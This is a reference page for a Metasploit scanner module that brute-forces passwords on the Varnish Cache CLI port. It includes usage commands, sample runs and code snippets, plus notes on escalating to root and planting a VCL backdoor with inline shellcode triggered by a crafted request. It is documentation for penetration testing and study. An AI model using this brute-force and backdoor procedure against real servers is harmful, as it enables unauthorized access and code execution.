Varnish Cache CLI Login Utility - Metasploit
This page contains detailed information about how to use the auxiliary/scanner/varnish/varnish_cli_login metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Varnish Cache CLI Login Utility
Module: auxiliary/scanner/varnish/varnish_cli_login
Source code: modules/auxiliary/scanner/varnish/varnish_cli_login.rb
Disclosure date: -
Last modification time: 2019-06-27 17:06:32 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 6082
List of CVEs: CVE-2009-2936
This module attempts to login to the Varnish Cache (varnishd) CLI instance using a bruteforce list of passwords.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts.
msf > use auxiliary/scanner/varnish/varnish_cli_login
msf auxiliary(varnish_cli_login) > show options
... show and set options ...
msf auxiliary(varnish_cli_login) > set RHOSTS ip-range
msf auxiliary(varnish_cli_login) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(varnish_cli_login) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(varnish_cli_login) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(varnish_cli_login) > set RHOSTS file:/tmp/ip_list.txt
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
Ubuntu 14.04 can apt-get install varnish. At the time of writing that installed varnish-3.0.5 revision 1a89b1f.
Kali installed varnish-5.0.0 revision 99d036f
Varnish installed and ran the cli on localhost. First lets kill the service: sudo service varnish stop. Now, there are two configurations we want to test:
- No Authentication:
varnishd -T 0.0.0.0:6082. Varnish 4 and later require either passing '-S ""', or may not support unauthenticated mode at all. - Authentication (based on shared secret file):
varnishd -T 0.0.0.0:6082 -S file.- I made an easy test one
echo "secret" > ~/secret
- I made an easy test one
Exploitation Notes
These notes were taken from the original module in EDB, and can be used when developing a working remote exploit
- varnishd typically runs as root, forked as unpriv.
- 'param.show' lists configurable options.
- 'cli_timeout' is 60 seconds. param.set cli_timeout 99999 (?) if we want to inject payload into a client thread and avoid being killed.
- 'user' is nobody. param.set user root (may have to stop/start the child to activate)
- 'group' is nogroup. param.set group root (may have to stop/start the child to activate)
- (unless varnishd is launched with -r user,group (read-only) implemented in v4, which may make priv esc fail).
- vcc_unsafe_path is on. used to 'import ../../../../file' etc.
- vcc_allow_inline_c is off. param.set vcc_allow_inline_c on to enable code execution.
- code execution notes:
* quotes must be escaped \"
* \n is a newline
* C{ }C denotes raw C code.
* e.g. C{ unsigned char shellcode[] = \"\xcc\"; }C
* #import etc must be "newline", i.e. C{ \n#include \n dosomething(); }C (without 2x \n, include statement will not interpret correctly).
* C{ asm(\"int3\"); }C can be used for inline assembly / shellcode.
* varnishd has it's own 'vcl' syntax. can't seem to inject C randomly - must fit VCL logic.
* example trigger for backdoor:
VCL server:
vcl.inline foo "vcl 4.0;\nbackend b { . host = \"127.0.0.1\"; } sub vcl_recv { if (req.url ~ \"^/backd00r\") { C{ asm(\"int3\"); }C } } \n"
vcl.use foo
start
Attacker:
telnet target 80
GET /backd00r HTTP/1.1
Host: 127.0.0.1
(... wait for child to execute debug trap INT3 / shellcode).
CLI protocol notes from website:
The CLI protocol used on the management/telnet interface is a strict request/response protocol, there are no unsolicited transmissions from the responding end.
Requests are whitespace separated tokens terminated by a newline (NL) character.
Tokens can be quoted with "..." and common backslash escape forms are accepted: (\n), (\r), (\t), (
), (\"), (\%03o) and (\x%02x)
The response consists of a header which can be read as fixed format or ASCII text:
1-3 %03d Response code
4 ' ' Space
5-12 %8d Length of body
13 \n NL character.
Followed by the number of bytes announced by the header.
The Responsecode is numeric shorthand for the nature of the reaction, with the following values currently defined in include/cli.h:
enum cli_status_e {
CLIS_SYNTAX = 100,
CLIS_UNKNOWN = 101,
CLIS_UNIMPL = 102,
CLIS_TOOFEW = 104,
CLIS_TOOMANY = 105,
CLIS_PARAM = 106,
CLIS_OK = 200,
CLIS_CANT = 300,
CLIS_COMMS = 400,
CLIS_CLOSE = 500
};
Verification Steps
Example steps in this format:
- Install the application
- Start msfconsole
- Do:
use auxiliary/scanner/varnish/varnish_cli_login - Do:
run - Find a valid login.
Options
PASS_FILE
File which contains the password list to use.
Scenarios
Running against Ubuntu 14.04 with varnish-3.0.5 revision 1a89b1f and NO AUTHENTICATION
resource (varnish.rc)> use auxiliary/scanner/varnish/varnish_cli_login
resource (varnish.rc)> set pass_file /root/varnish.list
pass_file => /root/varnish.list
resource (varnish.rc)> set rhosts 192.168.2.85
rhosts => 192.168.2.85
resource (varnish.rc)> set verbose true
verbose => true
resource (varnish.rc)> run
[+] 192.168.2.85:6082 - 192.168.2.85:6082 - LOGIN SUCCESSFUL: No Authentication Required
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(varnish_cli_login) >
Running against Ubuntu 14.04 with varnish-3.0.5 revision 1a89b1f
resource (varnish.rc)> use auxiliary/scanner/varnish/varnish_cli_login
resource (varnish.rc)> set pass_file /root/varnish.list
pass_file => /root/varnish.list
resource (varnish.rc)> set rhosts 192.168.2.85
rhosts => 192.168.2.85
resource (varnish.rc)> set verbose true
verbose => true
resource (varnish.rc)> run
[*] 192.168.2.85:6082 - 192.168.2.85:6082 - Authentication Required
[!] 192.168.2.85:6082 - No active DB -- Credential data will not be saved!
[*] 192.168.2.85:6082 - 192.168.2.85:6082 - LOGIN FAILED: bad
[*] 192.168.2.85:6082 - 192.168.2.85:6082 - LOGIN FAILED: good
[+] 192.168.2.85:6082 - 192.168.2.85:6082 - LOGIN SUCCESSFUL: secret
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Go back to menu.
Msfconsole Usage
Here is how the scanner/varnish/varnish_cli_login auxiliary module looks in the msfconsole:
msf6 > use auxiliary/scanner/varnish/varnish_cli_login
msf6 auxiliary(scanner/varnish/varnish_cli_login) > show info
Name: Varnish Cache CLI Login Utility
Module: auxiliary/scanner/varnish/varnish_cli_login
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
aushack <[email protected]>
h00die <[email protected]>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASS_FILE /opt/metasploit-framework/embedded/framework/data/wordlists/unix_passwords.txt yes File containing passwords, one per line
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 6082 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
Description:
This module attempts to login to the Varnish Cache (varnishd) CLI
instance using a bruteforce list of passwords.
References:
OSVDB (67670)
https://nvd.nist.gov/vuln/detail/CVE-2009-2936
https://www.exploit-db.com/exploits/35581
https://www.varnish-cache.org/trac/wiki/CLI
Module Options
This is a complete list of options available in the scanner/varnish/varnish_cli_login auxiliary module:
msf6 auxiliary(scanner/varnish/varnish_cli_login) > show options
Module options (auxiliary/scanner/varnish/varnish_cli_login):
Name Current Setting Required Description
---- --------------- -------- -----------
PASS_FILE /opt/metasploit-framework/embedded/framework/data/wordlists/unix_passwords.txt yes File containing passwords, one per line
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 6082 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
Advanced Options
Here is a complete list of advanced options supported by the scanner/varnish/varnish_cli_login auxiliary module:
msf6 auxiliary(scanner/varnish/varnish_cli_login) > show advanced
Module advanced options (auxiliary/scanner/varnish/varnish_cli_login):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the scanner/varnish/varnish_cli_login module can do:
msf6 auxiliary(scanner/varnish/varnish_cli_login) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the scanner/varnish/varnish_cli_login auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(scanner/varnish/varnish_cli_login) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
<IP>:<RPORT> - Unable to connect
Here is a relevant code snippet related to the "<IP>:<RPORT> - Unable to connect" error message:
60: vprint_status "#{ip}:#{rport} - Authentication Required"
61: end
62: close_session
63: disconnect
64: rescue Rex::ConnectionError, EOFError, Timeout::Error
65: print_error "#{ip}:#{rport} - Unable to connect"
66: end
67:
68: cred_collection = Metasploit::Framework::CredentialCollection.new(
69: pass_file: datastore['PASS_FILE'],
70: username: '<BLANK>'
<IP>:<RPORT> - LOGIN FAILED: <RESULT.CREDENTIAL.PRIVATE>
Here is a relevant code snippet related to the "<IP>:<RPORT> - LOGIN FAILED: <RESULT.CREDENTIAL.PRIVATE>" error message:
90: credential_data[:core] = credential_core
91: create_credential_login(credential_data)
92:
93: print_good "#{ip}:#{rport} - Login Successful: #{result.credential.private}"
94: else
95: invalidate_login(credential_data)
96: vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential.private}"
97: end
98: end
99: end
100: end
Go back to menu.
Related Pull Requests
- #12022 Merged Pull Request: Deregister PASSWORD_SPRAY option for LoginScanner modules
- #9189 Merged Pull Request: Change author name to nick.
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7652 Merged Pull Request: Varnish cli login module
References
See Also
Check also the following modules related to this module:
- auxiliary/scanner/varnish/varnish_cli_file_read
- exploit/dialup/multi/login/manyargs
- auxiliary/scanner/http/cisco_asa_clientless_vpn
- auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec
- auxiliary/scanner/scada/modbusclient
- auxiliary/scanner/scada/pcomclient
- auxiliary/admin/atg/atg_client
- auxiliary/admin/scada/yokogawa_bkbcopyd_client
- auxiliary/client/hwbridge/connect
- auxiliary/client/iec104/iec104
- auxiliary/client/mms/send_mms
- auxiliary/client/sms/send_text
- auxiliary/client/smtp/emailer
- auxiliary/client/telegram/send_message
- auxiliary/dos/dhcp/isc_dhcpd_clientid
- auxiliary/fuzzers/ftp/client_ftp
- auxiliary/server/dhclient_bash_env
- auxiliary/server/openssl_heartbeat_client_memory
Authors
- aushack
- h00die <[email protected]>
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
